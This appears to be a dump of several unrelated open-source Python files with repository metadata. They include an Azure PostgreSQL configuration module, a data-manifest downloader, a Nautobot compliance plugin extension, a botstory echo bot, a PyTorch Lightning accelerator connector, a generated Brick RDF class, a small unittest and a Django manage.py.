Actions.Delete elif self.state == 'present': self.log("Need to check if Configuration instance has to be deleted or may be updated") if self.value != old_response.get('value'): self.to_do = Actions.Update if (self.to_do == Actions.Create) or (self.to_do == Actions.Update): self.log("Need to Create / Update the Configuration instance") if self.check_mode: self.results['changed'] = True return self.results response = self.create_update_configuration() self.results['changed'] = True self.log("Creation / Update done") elif self.to_do == Actions.Delete: self.log("Configuration instance deleted") self.results['changed'] = True if self.check_mode: return self.results self.delete_configuration() else: self.log("Configuration instance unchanged") self.results['changed'] = False response = old_response if response: self.results["id"] = response["id"] return self.results def create_update_configuration(self): self.log("Creating / Updating the Configuration instance {0}".format(self.name)) try: response = self.postgresql_client.configurations.create_or_update(resource_group_name=self.resource_group, server_name=self.server_name, configuration_name=self.name, value=self.value, source='user-override') if isinstance(response, LROPoller): response = self.get_poller_result(response) except CloudError as exc: self.log('Error attempting to create the Configuration instance.') self.fail("Error creating the Configuration instance: {0}".format(str(exc))) return response.as_dict() def delete_configuration(self): self.log("Deleting the Configuration instance {0}".format(self.name)) try: response = self.postgresql_client.configurations.create_or_update(resource_group_name=self.resource_group, server_name=self.server_name, configuration_name=self.name, source='system-default') except CloudError as e: self.log('Error attempting to delete the Configuration instance.') self.fail("Error deleting the Configuration instance: {0}".format(str(e))) return True def get_configuration(self): self.log("Checking if the Configuration instance {0} is present".format(self.name)) found = False try: response = self.postgresql_client.configurations.get(resource_group_name=self.resource_group, server_name=self.server_name, configuration_name=self.name) found = True self.log("Response : {0}".format(response)) self.log("Configuration instance : {0} found".format(response.name)) except CloudError as e: self.log('Did not find the Configuration instance.') if found is True: return response.as_dict() return False def main(): """Main execution""" AzureRMPostgreSqlConfigurations() if __name__ == '__main__': main()
75e77756f7e98beff12a713496ae5b97436d939e
4f6e4fdc31396ee5ca8995d796af0365d0976934
/scripts/collect_manifest.py
91955f9409e83ceb223aa2225c1a34e317e45502
[]
no_license
dannguyen/quickdataproject-template
ea84426629cb5aa3b3be9adc089b9e8c290c32cb
8f598b3abd9f23b39bf26a807d217f165fb03289
refs/heads/master
2022-11-29T05:29:22.383439
2020-08-06T00:07:06
2020-08-06T00:07:06
282,715,134
4
1
null
null
null
null
UTF-8
Python
false
false
1,431
py
#!/usr/bin/env python """ autocollect_manifest.py Reads data/MANIFEST.yaml, and for each entry where autocollect==true, downloads from the corresponding `url` """ from sys import path as syspath; syspath.append('./scripts') from utils.myfetch import download, existed_size from utils.mylog import mylog from pathlib import Path import requests import yaml MANIFEST_PATH = Path('./data/DATA_MANIFEST.yaml') def collect_manifest(): """ returns list of tuples, with file filepath and source url filtered for data/collected prefixes """ mani = yaml.load(MANIFEST_PATH.open(), Loader=yaml.BaseLoader) return [(filepath, v['url']) for filepath, v in mani.items() if v.get('autocollect') == 'true'] def main(): target_dir = MANIFEST_PATH.parent for filename, url in collect_manifest(): target_path = target_dir.joinpath(filename) _bx = existed_size(target_path) if _bx: mylog(f"{target_path} already exists, with {_bx} bytes", label='Skipping') else: mylog(url, label='Fetching') content = download(url) target_path.parent.mkdir(exist_ok=True, parents=True) with open(target_path, 'wb') as target: for cx in content: target.write(cx) mylog(f"{existed_size(target_path)} bytes to {target_path}", label='Wrote') if __name__ == '__main__': main()
caad16e683e5fb3ded0072a758ed1fe6f5324386
9e2943857c3b5b46b4fea59f0e9a46aae54e17a8
/nautobot_golden_config/template_content.py
3462a238d115e16e9ed5aa778004d862ee60b025
[ "Apache-2.0" ]
permissive
danisoltani/nautobot-plugin-golden-config
883e40ef313c29d3d5197b7f17ca68e76e7bad95
f285af4bdc6340ae7276c372d3e85a0021c078ed
refs/heads/develop
2023-05-05T18:51:47.439841
2021-04-28T04:28:48
2021-04-28T04:28:48
363,667,445
0
0
NOASSERTION
2021-05-02T14:56:00
2021-05-02T14:14:22
null
UTF-8
Python
false
false
3,317
py
"""Added content to the device model view for config compliance.""" from django.db.models import Count, Q from nautobot.extras.plugins import PluginTemplateExtension from .models import ConfigCompliance, GoldenConfiguration from .utilities.constant import ENABLE_COMPLIANCE, CONFIG_FEATURES from .utilities.helper import get_allowed_os_from_nested class ConfigComplianceDeviceCheck(PluginTemplateExtension): # pylint: disable=abstract-method """Plugin extension class for config compliance.""" model = "dcim.device" def get_device(self): """Get device object.""" return self.context["object"] def right_page(self): """Content to add to the configuration compliance.""" comp_obj = ( ConfigCompliance.objects.filter(**get_allowed_os_from_nested()) .filter(device=self.get_device()) .values("feature", "compliance") ) extra_context = { "compliance": comp_obj, "device": self.get_device(), "template_type": "device-compliance", } return self.render( "nautobot_golden_config/content_template.html", extra_context=extra_context, ) class ConfigComplianceSiteCheck(PluginTemplateExtension): # pylint: disable=abstract-method """Plugin extension class for config compliance.""" model = "dcim.site" def get_site_slug(self): """Get site object.""" return self.context["object"] def right_page(self): """Content to add to the configuration compliance.""" comp_obj = ( ConfigCompliance.objects.values("feature") .filter(**get_allowed_os_from_nested()) .filter(device__site__slug=self.get_site_slug().slug) .annotate( compliant=Count("feature", filter=Q(compliance=True)), non_compliant=Count("feature", filter=~Q(compliance=True)), ) .values("feature", "compliant", "non_compliant") ) extra_context = {"compliance": comp_obj, "template_type": "site"} return self.render( "nautobot_golden_config/content_template.html", extra_context=extra_context, ) class ConfigDeviceDetails(PluginTemplateExtension): # pylint: disable=abstract-method """Plugin extension class for config compliance.""" model = "dcim.device" def get_device(self): """Get device object.""" return self.context["object"] def right_page(self): """Content to add to the configuration compliance.""" golden_config = ( GoldenConfiguration.objects.filter(**get_allowed_os_from_nested()).filter(device=self.get_device()).first() ) extra_context = { "device": self.get_device(), # device, "golden_config": golden_config, "template_type": "device-configs", "config_features": CONFIG_FEATURES, } return self.render( "nautobot_golden_config/content_template.html", extra_context=extra_context, ) extensions = [ConfigDeviceDetails] if ENABLE_COMPLIANCE: extensions.append(ConfigComplianceDeviceCheck) extensions.append(ConfigComplianceSiteCheck) template_extensions = extensions
49eb833b90b654ddd54f089d23f66718dd3cdf2b
15085c0dfc7f596fc03e2d69e9775860d5aece2b
/echo/main.py
6626d60850553bdbdc47c0dded10c03dad4bc93a
[ "MIT" ]
permissive
botstory/echo-bot
1fb56d48236d34b0a3f3f74cee0478a1df7b0414
9758fb5baf0fe033a2e29a8fb092e5a40ea70a0b
refs/heads/develop
2021-09-08T02:26:44.739492
2016-12-21T23:37:29
2016-12-21T23:37:29
71,016,543
0
0
MIT
2018-03-06T01:05:28
2016-10-15T22:18:12
Python
UTF-8
Python
false
false
4,719
py
#!/usr/bin/env python import asyncio from aiohttp_index import IndexMiddleware from botstory import chat, story from botstory.integrations import aiohttp, fb, mongodb from botstory.integrations.ga import tracker from botstory.middlewares import any, text import logging import os import pathlib logger = logging.getLogger('echo-bot') logger.setLevel(logging.DEBUG) PROJ_ROOT = pathlib.Path(__file__).parent # define stories @story.on_start() def on_start(): """ User just pressed `get started` button so we can greet him """ @story.part() async def greetings(message): await chat.say('Hi There! Nice to see you! ', message['user']) await chat.say('I''m very simple bot that show basic features of ' 'https://github.com/botstory/botstory ' 'open source platform.', message['user']) await chat.say('You can send me any text message and ' 'I will echo it back to you.', message['user']) await chat.say('Any other messages will just bounce ' 'with trivial answer ' 'that I don''t know what is it.', message['user']) await chat.say('You can find my source here ' 'https://github.com/botstory/echo-bot.', message['user']) await chat.say('Lets make the best bot together!', message['user']) @story.on(receive=text.Any()) def echo_story(): """ React on any text message """ @story.part() async def echo(message): await chat.say('Hi! I just got something from you:', message['user']) await chat.say('> {}'.format(message['data']['text']['raw']), message['user']) @story.on(receive=any.Any()) def else_story(): """ And all the rest messages as well """ @story.part() async def something_else(message): await chat.say('Hm I don''t know what is it', message['user']) # setup modules def init(auto_start=True, fake_http_session=None): # Interface for communication with FB story.use(fb.FBInterface( # will show on initial screen greeting_text='Hello dear {{user_first_name}}! ' 'I'' m demo bot of BotStory framework.', # you should get on admin panel for the Messenger Product in Token Generation section page_access_token=os.environ.get('FB_ACCESS_TOKEN', 'TEST_TOKEN'), # menu of the bot that user has access all the time persistent_menu=[{ 'type': 'postback', 'title': 'Monkey Business', 'payload': 'MONKEY_BUSINESS' }, { 'type': 'web_url', 'title': 'Source Code', 'url': 'https://github.com/botstory/bot-story/' }], # should be the same as in admin panel for the Webhook Product webhook_url='/webhook{}'.format(os.environ.get('FB_WEBHOOK_URL_SECRET_PART', '')), webhook_token=os.environ.get('FB_WEBHOOK_TOKEN', None), )) # Interface for HTTP http = story.use(aiohttp.AioHttpInterface( port=os.environ.get('API_PORT', 8080), auto_start=auto_start, middlewares=[IndexMiddleware()], )) # User and Session storage story.use(mongodb.MongodbInterface( uri=os.environ.get('MONGODB_URI', 'mongo'), db_name=os.environ.get('MONGODB_DB_NAME', 'echobot'), )) story.use(tracker.GAStatistics( tracking_id=os.environ.get('GA_ID'), )) # for test purpose http.session = fake_http_session return http async def setup(fake_http_session=None): logger.info('setup') init(auto_start=False, fake_http_session=fake_http_session) await story.setup() async def start(auto_start=True, fake_http_session=None): http = init(auto_start, fake_http_session) logger.debug('static {}'.format(str(PROJ_ROOT.parent / 'static'))) http.app.router.add_static('/', path=str(PROJ_ROOT.parent / 'static'), name='static', ) # start bot await story.start() logger.info('started') return http.app async def stop(): await story.stop() # TODO: should be something like # story.clear() story.middlewares = [] # launch app def main(forever=True): logging.basicConfig(level=logging.DEBUG) loop = asyncio.get_event_loop() app = loop.run_until_complete(start(auto_start=forever)) # and run forever if forever: story.forever(loop) # or you can use gunicorn for an app of http interface return app if __name__ == '__main__': loop = asyncio.get_event_loop() loop.run_until_complete(setup())
d41ed24523fdec28e5f5f3c79923497b57af5d94
b96a4062f5ad420dd02efed82b47dd9c249cb46c
/pytorch_lightning/trainer/connectors/accelerator_connector.py
d32970d61fa9bc5fde735ca940cf77c6f67147c2
[ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ]
permissive
borisdayma/pytorch-lightning
ebc210a1e7901b5f87ab67e4886bfe20b478fe33
4b7c0fae00084b72dffe37fdd0ea7d2e9b60d103
refs/heads/master
2021-11-23T07:34:01.842134
2021-02-19T17:00:27
2021-02-19T17:00:27
238,756,095
1
1
Apache-2.0
2020-02-06T18:27:51
2020-02-06T18:27:50
null
UTF-8
Python
false
false
25,287
py
# Copyright The PyTorch Lightning team. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os from typing import List, Optional, Sequence, Union import torch from pytorch_lightning import _logger as log from pytorch_lightning.accelerators.accelerator import Accelerator from pytorch_lightning.accelerators.cpu import CPUAccelerator from pytorch_lightning.accelerators.gpu import GPUAccelerator from pytorch_lightning.accelerators.tpu import TPUAccelerator from pytorch_lightning.plugins import ( ApexMixedPrecisionPlugin, DataParallelPlugin, DDP2Plugin, DDPPlugin, DDPShardedPlugin, DDPSpawnPlugin, DDPSpawnShardedPlugin, DeepSpeedPlugin, DeepSpeedPrecisionPlugin, HorovodPlugin, NativeMixedPrecisionPlugin, PrecisionPlugin, ShardedNativeMixedPrecisionPlugin, SingleDevicePlugin, SingleTPUPlugin, TPUHalfPrecisionPlugin, TPUSpawnPlugin, TrainingTypePlugin, ) from pytorch_lightning.plugins.environments import ClusterEnvironment, SLURMEnvironment, TorchElasticEnvironment from pytorch_lightning.tuner.auto_gpu_select import pick_multiple_gpus from pytorch_lightning.utilities import ( _APEX_AVAILABLE, _HOROVOD_AVAILABLE, _NATIVE_AMP_AVAILABLE, _TPU_AVAILABLE, AMPType, device_parser, DeviceType, DistributedType, rank_zero_only, ) from pytorch_lightning.utilities.distributed import rank_zero_info, rank_zero_warn from pytorch_lightning.utilities.exceptions import MisconfigurationException if _HOROVOD_AVAILABLE: import horovod.torch as hvd class AcceleratorConnector(object): def __init__( self, num_processes, tpu_cores, distributed_backend, auto_select_gpus, gpus, num_nodes, sync_batchnorm, benchmark, replace_sampler_ddp, deterministic, precision, amp_type, amp_level, plugins, ): # initialization self._device_type = DeviceType.CPU self._distrib_type = None self.num_processes = num_processes self.tpu_cores = device_parser.parse_tpu_cores(tpu_cores) self.distributed_backend = distributed_backend self.auto_select_gpus = auto_select_gpus self.gpus = gpus self.num_nodes = num_nodes self.sync_batchnorm = sync_batchnorm self.benchmark = benchmark self.replace_sampler_ddp = replace_sampler_ddp self.deterministic = deterministic self.precision = precision self.amp_type = amp_type.lower() if isinstance(amp_type, str) else None self.amp_level = amp_level self.is_slurm_managing_tasks = False self._precision_plugin: Optional[PrecisionPlugin] = None self._training_type_plugin: Optional[TrainingTypePlugin] = None self._cluster_environment: Optional[ClusterEnvironment] = None # init the default rank if exists # we need to call this here or NVIDIA flags and other messaging in init will show on all ranks # this way we only show it on rank 0 if "LOCAL_RANK" in os.environ: rank_zero_only.rank = int(os.environ["LOCAL_RANK"]) # for gpus allow int, string and gpu list if auto_select_gpus and isinstance(gpus, int): self.gpus = pick_multiple_gpus(gpus) self.parallel_device_ids = device_parser.parse_gpu_ids(self.gpus) self.set_distributed_mode() self.configure_slurm_ddp() self.handle_given_plugins(plugins) self.accelerator = self.select_accelerator() # override dist backend when using tpus if self.on_tpu: self.distributed_backend = "tpu" # init flags for SLURM+DDP to work self.world_size = 1 self.interactive_ddp_procs = [] self.global_rank = 0 # benchmarking # TODO: should this be moved to GPU accelerator? torch.backends.cudnn.benchmark = self.benchmark # determinism for cudnn # TODO: should this be moved to GPU accelerator? torch.backends.cudnn.deterministic = deterministic if deterministic: # fixing non-deterministic part of horovod # https://github.com/PyTorchLightning/pytorch-lightning/pull/1572/files#r420279383 os.environ["HOROVOD_FUSION_THRESHOLD"] = str(0) self.replace_sampler_ddp = replace_sampler_ddp def handle_given_plugins( self, plugins: Optional[Union[ClusterEnvironment, TrainingTypePlugin, PrecisionPlugin, Sequence]] ): plugins = plugins if plugins is not None else [] if isinstance(plugins, str): plugins = [plugins] if not isinstance(plugins, Sequence): plugins = [plugins] training_type = None precision = None cluster_environment = None for plug in plugins: if isinstance(plug, str): self.set_distributed_mode(plug) elif isinstance(plug, TrainingTypePlugin): if training_type is None: training_type = plug else: raise MisconfigurationException( 'You can only specify one precision and one training type plugin.' f' Found more than 1 training type plugin: {type(plug).__name__}' ) elif isinstance(plug, PrecisionPlugin): if precision is None: precision = plug else: raise MisconfigurationException( 'You can only specify one precision and one training type plugin.' f' Found more than 1 precision plugin: {type(plug).__name__}' ) elif isinstance(plug, ClusterEnvironment): if cluster_environment is None: cluster_environment = plug else: raise MisconfigurationException( 'You can only specify one cluster environment. Found more than 1 cluster environment plugin' ) else: raise MisconfigurationException( f'Found invalid type for plugin {plug}. Expected a precision or training type plugin.' ) self._training_type_plugin = training_type self._training_type_plugin = self.training_type_plugin self._precision_plugin = precision self._cluster_environment = cluster_environment or self.select_cluster_environment() @property def precision_plugin(self) -> PrecisionPlugin: if self._precision_plugin is None: self._precision_plugin = self.select_precision_plugin() return self._precision_plugin @property def training_type_plugin(self) -> TrainingTypePlugin: if self._training_type_plugin is None: self._training_type_plugin = self.select_training_type_plugin() else: self._training_type_plugin = self.resolve_training_type_plugin(self._training_type_plugin) return self._training_type_plugin @property def cluster_environment(self) -> ClusterEnvironment: return self._cluster_environment @property def on_cpu(self) -> bool: return self._device_type == DeviceType.CPU @property def on_tpu(self) -> bool: return self.tpu_cores is not None @property def tpu_id(self) -> Optional[int]: if self.on_tpu and isinstance(self.tpu_cores, list): return self.tpu_cores[0] return None @property def on_gpu(self) -> bool: gpus = self.parallel_device_ids return gpus is not None and len(gpus) > 0 and torch.cuda.is_available() @property def use_dp(self) -> bool: return self._distrib_type == DistributedType.DP @property def use_ddp(self) -> bool: return self._distrib_type in ( DistributedType.DDP, DistributedType.DDP_SPAWN, DistributedType.DDP_SHARDED, DistributedType.DDP_SHARDED_SPAWN, DistributedType.DEEPSPEED ) @property def use_ddp2(self) -> bool: return self._distrib_type == DistributedType.DDP2 @property def use_horovod(self) -> bool: return self._distrib_type == DistributedType.HOROVOD @property def use_deepspeed(self) -> bool: return self._distrib_type == DistributedType.DEEPSPEED @property def is_distributed(self) -> bool: is_distributed = self.use_ddp or self.use_ddp2 or self.use_horovod if self.on_tpu: is_distributed |= self.training_type_plugin.is_distributed return is_distributed @property def num_gpus(self) -> int: gpus = self.parallel_device_ids if gpus is None: return 0 return len(gpus) @property def parallel_devices(self) -> Union[List[torch.device], int]: if self.on_gpu: devices = [torch.device("cuda", i) for i in self.parallel_device_ids] elif self.on_tpu: # explicitly don't make a tpu device here! # https://github.com/PyTorchLightning/pytorch-lightning/issues/3169 devices = [i for i in self.parallel_device_ids] else: devices = [torch.device("cpu")] * self.num_processes return devices @property def root_gpu(self) -> Optional[int]: return self.accelerator.root_device.index if not isinstance(self.accelerator, TPUAccelerator) else None @property def is_using_torchelastic(self) -> bool: te_flags_passed = "WORLD_SIZE" in os.environ and ("GROUP_RANK" in os.environ or "NODE_RANK" in os.environ) return te_flags_passed def select_precision_plugin(self) -> PrecisionPlugin: # set precision type self.amp_type = AMPType.from_str(self.amp_type) if self._distrib_type == DistributedType.DEEPSPEED or isinstance(self._training_type_plugin, DeepSpeedPlugin): return DeepSpeedPrecisionPlugin(self.precision) if self.precision == 32: return PrecisionPlugin() elif self.precision == 16: if self.on_tpu: return TPUHalfPrecisionPlugin() if self.amp_type == AMPType.NATIVE: if self.on_cpu: raise MisconfigurationException( "You have asked for native AMP on CPU, but AMP is only available on GPU." ) elif not _NATIVE_AMP_AVAILABLE: msg = "You have asked for native AMP but your PyTorch version does not support it." \ " Consider upgrading with `pip install torch>=1.6`." if _APEX_AVAILABLE: self.amp_type = AMPType.APEX msg += " We will attempt to use NVIDIA Apex for this session." rank_zero_warn(msg) else: raise MisconfigurationException(msg) else: log.info("Using native 16bit precision.") if isinstance(self.training_type_plugin, (DDPShardedPlugin, DDPSpawnShardedPlugin)): return ShardedNativeMixedPrecisionPlugin() return NativeMixedPrecisionPlugin() if self.amp_type == AMPType.APEX: if not _APEX_AVAILABLE: raise MisconfigurationException( "You have asked for Apex AMP but you have not installed it yet." " Install apex first using this guide: https://github.com/NVIDIA/apex#linux" ) if isinstance(self.training_type_plugin, (DDPShardedPlugin, DDPSpawnShardedPlugin)): raise MisconfigurationException( "Sharded Plugin is not supported with Apex AMP," " please using native AMP for 16-bit precision." ) log.info("Using APEX 16bit precision.") return ApexMixedPrecisionPlugin(self.amp_level) raise NotImplementedError("We only support precisions 32 and 16!") def select_training_type_plugin(self) -> TrainingTypePlugin: if self.use_ddp2: plugin = DDP2Plugin(parallel_devices=self.parallel_devices, cluster_environment=self.cluster_environment) elif self.use_ddp and self.use_deepspeed: plugin = DeepSpeedPlugin( num_nodes=self.num_nodes, cluster_environment=self.select_cluster_environment(), parallel_devices=self.parallel_devices ) elif self.use_ddp: use_slurm_ddp = self.use_ddp and self.is_slurm_managing_tasks use_torchelastic_ddp = self.use_ddp and self.is_using_torchelastic use_ddp_spawn = self._distrib_type == DistributedType.DDP_SPAWN use_ddp_cpu_spawn = self.use_ddp and self.on_cpu use_ddp_cpu_torch_elastic = use_ddp_cpu_spawn and self.is_using_torchelastic use_ddp_cpu_slurm = use_ddp_cpu_spawn and self.is_slurm_managing_tasks use_ddp_sharded = self._distrib_type == DistributedType.DDP_SHARDED use_ddp_sharded_spawn = self._distrib_type == DistributedType.DDP_SHARDED_SPAWN # TODO: decouple from TE # ddp script mode uses the same flags as TE if os.environ.get("PL_IN_DDP_SUBPROCESS", False): use_torchelastic_ddp = False if self.on_tpu: ddp_plugin_cls = TPUSpawnPlugin elif use_ddp_sharded: ddp_plugin_cls = DDPShardedPlugin elif use_ddp_sharded_spawn: ddp_plugin_cls = DDPSpawnShardedPlugin elif use_ddp_cpu_slurm or use_slurm_ddp or use_ddp_cpu_torch_elastic or use_torchelastic_ddp: ddp_plugin_cls = DDPPlugin elif use_ddp_spawn or use_ddp_cpu_spawn: ddp_plugin_cls = DDPSpawnPlugin else: ddp_plugin_cls = DDPPlugin plugin = ddp_plugin_cls( parallel_devices=self.parallel_devices, num_nodes=self.num_nodes, cluster_environment=self.cluster_environment, sync_batchnorm=self.sync_batchnorm, ) elif self.use_dp: plugin = DataParallelPlugin(parallel_devices=self.parallel_devices) elif self.use_horovod: plugin = HorovodPlugin(parallel_devices=self.parallel_devices) elif self.on_tpu: if isinstance(self.tpu_cores, list): plugin = SingleTPUPlugin(self.tpu_id) else: plugin = TPUSpawnPlugin(parallel_devices=list(range(self.tpu_cores))) else: single_gpu_ordinal = device_parser.determine_root_gpu_device(self.parallel_device_ids) plugin = SingleDevicePlugin(device=torch.device(f"cuda:{single_gpu_ordinal}" if self.on_gpu else "cpu")) return plugin def resolve_training_type_plugin(self, training_type: TrainingTypePlugin) -> TrainingTypePlugin: # necessary for when the user has passed in a plugin if hasattr(training_type, 'parallel_devices') and not getattr(training_type, 'parallel_devices'): training_type.parallel_devices = self.parallel_devices if hasattr(training_type, 'num_processes'): training_type.num_processes = len(self.parallel_devices) if hasattr(training_type, 'cluster_environment') and getattr(training_type, 'cluster_environment') is None: training_type.cluster_environment = self.select_cluster_environment() if hasattr(training_type, 'num_nodes') and getattr(training_type, 'num_nodes') is None: training_type.num_nodes = self.num_nodes return training_type def select_accelerator(self) -> Accelerator: if isinstance(self.distributed_backend, Accelerator): # custom accelerator from user if self._precision_plugin is not None or self._training_type_plugin is not None: # plugins also specified by user rank_zero_warn( 'Specified `Precision` and `TrainingType` plugins will be ignored,' ' since an `Accelerator` instance was provided.' ) return self.distributed_backend if self.on_gpu: acc_cls = GPUAccelerator elif self.on_tpu: acc_cls = TPUAccelerator else: acc_cls = CPUAccelerator return acc_cls( precision_plugin=self.precision_plugin, training_type_plugin=self.training_type_plugin, ) def select_cluster_environment(self) -> ClusterEnvironment: if self._cluster_environment is not None: return self._cluster_environment if self.is_slurm_managing_tasks: env = SLURMEnvironment() # TODO: decouple DDP from SLURM # refactor and let generic cluster env hold the information about who spawns the processes os.environ["PL_IN_DDP_SUBPROCESS"] = "1" elif self.is_using_torchelastic: env = TorchElasticEnvironment() # TODO: decouple DDP from TE # refactor and let generic cluster env hold the information about who spawns the processes os.environ["PL_IN_DDP_SUBPROCESS"] = "1" else: # TODO: maybe introduce a DefaultEnvironment? env = TorchElasticEnvironment() return env def set_distributed_mode(self, distributed_backend: Optional[str] = None): if distributed_backend is not None: self.distributed_backend = distributed_backend if isinstance(self.distributed_backend, Accelerator): return if self.distributed_backend is None: if self.has_horovodrun(): self._set_horovod_backend() elif self.num_gpus == 0 and (self.num_nodes > 1 or self.num_processes > 1): self._distrib_type = DistributedType.DDP elif self.num_gpus > 1: rank_zero_warn( 'You requested multiple GPUs but did not specify a backend, e.g.' ' `Trainer(accelerator="dp"|"ddp"|"ddp2")`. Setting `accelerator="ddp_spawn"` for you.' ) self.distributed_backend = "ddp_spawn" # special case with DDP on CPUs if self.distributed_backend == "ddp_cpu": self._distrib_type = DistributedType.DDP if self.num_gpus > 0: rank_zero_warn( 'You requested one or more GPUs, but set the backend to `ddp_cpu`. Training will not use GPUs.' ) self.parallel_device_ids = None if self.num_processes is None: # define the max CPU available self.num_processes = os.cpu_count() # special case with TPUs elif self.distributed_backend == 'tpu': self._device_type = DeviceType.TPU elif self.distributed_backend and self._distrib_type is None: self._distrib_type = DistributedType(self.distributed_backend) # unless you request explicitly for CPU and some GPU are available use them _on_cpu = self.distributed_backend and 'cpu' in self.distributed_backend if self.num_gpus > 0 and not _on_cpu: self._device_type = DeviceType.GPU _distrib_types = (DistributedType.DP, DistributedType.DDP, DistributedType.DDP_SPAWN, DistributedType.DDP2) # DP and DDP2 cannot run without GPU if self.num_gpus == 0 and self._distrib_type in _distrib_types and not _on_cpu: rank_zero_warn( 'You requested distributed training on GPUs, but none is available, so we set backend to `ddp_cpu`.' ) # todo: in some cases it yield in comarison None and int if (self.num_nodes and self.num_nodes > 1) or (self.num_processes and self.num_processes > 1): self._distrib_type = DistributedType.DDP else: rank_zero_warn('You are running on single node with no parallelization, so distributed has no effect.') self._distrib_type = None # for DDP overwrite nb processes by requested GPUs if ( self._device_type == DeviceType.GPU and self._distrib_type in (DistributedType.DDP, DistributedType.DDP_SPAWN) ): self.num_processes = self.num_gpus if (self._device_type == DeviceType.GPU and self._distrib_type == DistributedType.DDP2): self.num_processes = self.num_nodes # Horovod is an extra case... if self.distributed_backend == "horovod": self._set_horovod_backend() # throw error to force user ddp or ddp2 choice _ddp = (DistributedType.DDP, DistributedType.DDP_SPAWN, DistributedType.DDP2) if (self.num_nodes > 1 and self._distrib_type not in _ddp): raise MisconfigurationException( 'DataParallel does not support num_nodes > 1. Switching to DistributedDataParallel for you. ' 'To silence this warning set `accelerator="ddp"` or `accelerator="ddp2"`' ) rank_zero_info(f'GPU available: {torch.cuda.is_available()}, used: {self._device_type == DeviceType.GPU}') num_cores = self.tpu_cores if self.tpu_cores is not None else 0 rank_zero_info(f'TPU available: {_TPU_AVAILABLE}, using: {num_cores} TPU cores') if torch.cuda.is_available() and self._device_type != DeviceType.GPU: rank_zero_warn("GPU available but not used. Set the --gpus flag when calling the script.") def _set_horovod_backend(self): self.check_horovod() self._distrib_type = DistributedType.HOROVOD # Initialize Horovod to get rank / size info hvd.init() if self.on_gpu: # Horovod assigns one local GPU per process self.parallel_device_ids = list(range(hvd.local_size())) else: self.num_processes = hvd.local_size() def check_horovod(self): """Raises a `MisconfigurationException` if the Trainer is not configured correctly for Horovod.""" if not _HOROVOD_AVAILABLE: raise MisconfigurationException( 'Requested `distributed_backend="horovod"`, but Horovod is not installed.' "Install with \n $HOROVOD_WITH_PYTORCH=1 pip install horovod[pytorch]" ) if self.num_gpus > 1 or self.num_nodes > 1: raise MisconfigurationException( "Horovod does not support setting num_nodes / num_gpus explicitly. Use " "horovodrun / mpirun to configure the number of processes." ) @staticmethod def has_horovodrun() -> bool: """Returns True if running with `horovodrun` using Gloo or OpenMPI.""" return "OMPI_COMM_WORLD_RANK" in os.environ or "HOROVOD_RANK" in os.environ def configure_slurm_ddp(self): # extract SLURM flag vars # whenever we have the correct number of tasks, we let slurm manage processes # otherwise we launch the required number of processes if self.use_ddp or self.use_ddp2: num_requested_gpus = self.num_gpus * self.num_nodes num_slurm_tasks = 0 try: num_slurm_tasks = int(os.environ["SLURM_NTASKS"]) self.is_slurm_managing_tasks = num_slurm_tasks == num_requested_gpus # enable slurm cpu if num_requested_gpus == 0: self.is_slurm_managing_tasks = num_slurm_tasks == self.num_processes # in interactive mode we don't manage tasks job_name = os.environ["SLURM_JOB_NAME"] if job_name == "bash": self.is_slurm_managing_tasks = False except Exception: # likely not on slurm, so set the slurm managed flag to false self.is_slurm_managing_tasks = False # used for tests only, set this flag to simulate slurm managing a task try: should_fake = int(os.environ["FAKE_SLURM_MANAGING_TASKS"]) if should_fake: self.is_slurm_managing_tasks = True except Exception: pass # notify user the that slurm is managing tasks if self.is_slurm_managing_tasks: rank_zero_info("Multi-processing is handled by Slurm.")
b85989f44c0c5678aef5406bd0f266f81c9b6801
930c207e245c320b108e9699bbbb036260a36d6a
/BRICK-RDFAlchemy/generatedCode/brick/brickschema/org/schema/_1_0_2/Brick/Run_Request.py
21243df3b2d7a7e6c9c7e61be74114b96e4b7e6b
[]
no_license
InnovationSE/BRICK-Generated-By-OLGA
24d278f543471e1ce622f5f45d9e305790181fff
7874dfa450a8a2b6a6f9927c0f91f9c7d2abd4d2
refs/heads/master
2021-07-01T14:13:11.302860
2017-09-21T12:44:17
2017-09-21T12:44:17
104,251,784
1
0
null
null
null
null
UTF-8
Python
false
false
335
py
from rdflib import Namespace, Graph, Literal, RDF, URIRef from rdfalchemy.rdfSubject import rdfSubject from rdfalchemy import rdfSingle, rdfMultiple, rdfList from brick.brickschema.org.schema._1_0_2.Brick.Run import Run class Run_Request(Run): rdf_type = Namespace('https://brickschema.org/schema/1.0.2/Brick#').Run_Request
8bf0c04b439cb5dfdf1f0c9dd08741647b06b7d5
bb2c530d891a95a5e93668ac3aa3bf71472c5909
/PracticeWithFunctionsTestCases/test_hypotenuse.py
ba3e25b9c46b6ab1142dcb1a32b2720b4a9a8c38
[]
no_license
http403/CS121
3e069805e53f2cda19427100225c3c4103f24f48
210fbd2d47fcdd63b7cb4c7b9ab1c9ef08c24b7a
refs/heads/master
2023-03-06T06:41:33.546807
2020-03-09T21:09:08
2020-03-09T21:09:08
235,925,919
0
0
null
null
null
null
UTF-8
Python
false
false
252
py
# YOU CAN IGNORE THIS FILE ENTIRELY from unittest import TestCase from functions import hypotenuse class TestHypotenuse(TestCase): def test_hypotenuse(self): self.assertAlmostEqual( hypotenuse(4, 5), 6.4, places=1 )
18bbbd2f85af509a742e8c341dc5c8b2b34e9a4a
366d8a986cb41df0f3493eeaf5f4dba471efe3ed
/gs31/manage.py
d1a555947240382dd0a907cea210acaa4b00af31
[]
no_license
ManishShah120/Learning-DjangoRESTAPI
360c21f829c2087eabcfc5131188c61a7186fb9d
11c446c1cde98e321672d6670400c23d60c1a329
refs/heads/master
2023-02-11T01:33:22.355854
2021-01-08T15:11:35
2021-01-08T15:11:35
325,955,813
5
0
null
null
null
null
UTF-8
Python
false
false
660
py
#!/usr/bin/env python """Django's command-line utility for administrative tasks.""" import os import sys def main(): """Run administrative tasks.""" os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'gs31.settings') try: from django.core.management import execute_from_command_line except ImportError as exc: raise ImportError( "Couldn't import Django. Are you sure it's installed and " "available on your PYTHONPATH environment variable? Did you " "forget to activate a virtual environment?" ) from exc execute_from_command_line(sys.argv) if __name__ == '__main__': main()
